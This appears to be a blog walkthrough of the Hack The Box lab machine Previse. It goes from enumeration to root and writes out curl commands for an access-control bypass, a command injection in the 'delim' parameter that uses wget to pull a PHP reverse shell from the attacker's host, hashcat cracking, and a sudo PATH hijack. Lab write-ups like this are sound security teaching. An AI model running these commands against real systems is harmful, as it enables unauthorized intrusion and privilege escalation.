HTB — Previse Walkthroughs

Enumeration

enumeration previse machine with nmap using command :

nmap -sV -sC {ip}

  • -sV — shows port versions
  • -sC — make script scan against the port

We see that only ports 22 and 80 are opened.

22 — SSH

80 — HTTP

lets dig in and visit http port :)

ups, its only login page. the things we can do is brute force or make SQL injection which does not work at this point.

continue enumeration and start directory scan with ffuf.

ffuf -c -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://10.10.11.104/FUZZ

  • -c — used for colored status codes
  • -w — wordlist path
  • -u — target ip

result shows us that that where is no interesting web page. lets make again directory enumeration with .php extension

ffuf -c -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://10.10.11.104/FUZZ.php

at this point we will see something interesting.

here are tons of pages which should be exploitable.

most interesting page is nav.php. lets visit and see result

we will see result like this but whats next ? we cannot access any of this links because it redirects us to login page. it says 302 status code which is redirect response

lets use curl against accounts.php page

curl -i -X GET http://10.10.11.104/accounts.php

  • -i — show us headers
  • -X GET — used for GET Request

Boom ! we got a source code of accounts.php file. now lets dig in and see what is in

we mention that where is a typical registration form with name fields — username, password and confirm password

what we should do next ? we can send POST request with curl to make user and after login with our own user.

command look like this :

curl -X POST -d “username=someone&password=12345678&confirm=12345678” http://10.10.11.104/accounts.php

  • X POST — used for POST request
  • -d — used to send parameter like username, password and confirm password

after this command we can access website with username — someone and password — 12345678

we are in :)

now we have to enumerate website and most interesting directory is files.php but unfortunately we have not access to open our uploaded shell. the only permision we have is to download SITEBACKUP.zip file

lets download and dig into that file

we got a source code of that website pages. we have to dig into them and after some research we found a logs.php which contain interesting code. it looks like this

what does it says ? is says that if we are logged in and send POST request with parameter delim, it will execute command with exec function.

lets see this page on the website where it is used to send delim parameter.

its a file_logs.php where we can send comma, space and tab requests with parameter delim

now we can exploit it to send delim parameter and our reverse shell.

Firstly we have to gather our session and when send POST requests via curl against logs.php file where exec function is stored

Download PHP reverse shell from https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php and change IP and PORT !

Now lets upload our reverse shell into website via curl.

Start python server :

when use curl command :

curl -X POST -b “PHPSESSID=3g4cpjgge5qo15u9obnfafpd9j” -d ‘delim=space; wget http://10.10.16.19/php_reverse.php' http://10.10.11.104/logs.php

  • b — PHP session, make sure to use your own session
  • -d — send POST data with parameter delim

And we will successfully upload our PHP reverse shell into website

Lets visit our payload. in my case it is http://10.10.11.104/php_reverse.php.

before visit that URL, start nc listener :

The moment when we access URL which i mention above , we will get access on the server

Congratulation :)) we are in but it isn’t end. we haven’t access on user.txt which is stored into m4lwhere home folder.

Firstly we have to upgrade our shell into tty with command :

python3 -c ‘import pty; pty.spawn(“/bin/bash”)’

Next make some search into /var/www/html directory. open config.php file where MYSQL credentials are stored

After dig into MYSQL, we will see accounts table which contain hashed password of m4lwhere user — $1$🧂llol$DQpmdvnb7EeuO6UaqRItf.

Crack that hashed password with hashcat

hashcat -a 0 -m 500 ‘$1$🧂llol$DQpmdvnb7EeuO6UaqRItf.’ /usr/share/wordlists/rockyou.txt

Congratulations we get m4lwhere user password

Login with m4lwhere and get a User.txt :)

Privilege Escalation

Check our sudo privilege with Sudo -l

it says that we have sudo access on /opt/scripts/access_backup.

lets dig into that file. we will see that gzip command is used which is exploitable with $PATH

Make executable reverse shell file into /tmp directory and name it gzip.sh. change $PATH variable with command export PATH=/tmp:$PATH

Next when we run sudo /opt/scripts/access_backup.sh , we will get root access

Enjoy :)

--

--

--

Infosec/Pentester

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Testnet. Reward details!

Character Artist

451PCBcom (PCB) whitepaper v2.1 released.

Multi-Access Edge Computing at Ori

Split in PHP: What is str_split() function?

Use CircleCI to Drive CI/CD of Microservices into GKE

Introduction to Ansible: Getting Started With Multi-Utility Automation Tool (Part 1)

Give Me Your Tired Masses:

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Giorgi Barbakadze

Giorgi Barbakadze

Infosec/Pentester

More from Medium

HTB-Shocker

HTB —Beep Writeup

HTB — Forge Walkthroughs

Hack the box shibboleth writeup :